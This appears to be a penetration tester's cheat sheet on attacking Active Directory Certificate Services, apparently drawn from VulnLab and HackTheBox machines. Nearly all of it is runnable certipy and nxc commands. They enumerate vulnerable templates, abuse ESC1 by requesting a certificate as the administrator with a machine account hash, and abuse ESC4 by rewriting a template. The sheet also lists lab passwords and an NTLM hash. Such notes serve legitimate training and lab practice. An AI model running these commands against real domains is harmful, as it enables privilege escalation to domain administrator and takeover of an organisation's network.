📜Certificate Authority (CA)

Certificate Authority(CA)

• nxc ldap sendai.vl -u Elliot.Yates -p 'aditya123@' -M adcs

• To check for vulnerable certificates

sudo certipy-ad find -u 'a.briggs' -p 'password' -dc-ip <ip> -stdout -vulnerable

To get in bloodhound format : -old-bloodhound

• Add custom queries in ~./config/bloodhound/customqueries.json

Esc1

• To request certificate:

certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn 'administrator@hybrid.vl' -dc-ip 10.10.208.21 -key-size 4096 -debug

• To auth:

certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.208.21

Esc4

• Convert to ESC1 and follow ESC1 procedure:

certipy template -username 'clifford.davey'@sendai.vl -password RFmoB2WplgE_3p -template SendaiComputer -save-old

• Try PetitPotam

• Check nmap for certificate authority

• If found enumerate post exploitation with certify.exe

• Refer Absolute-HTB for more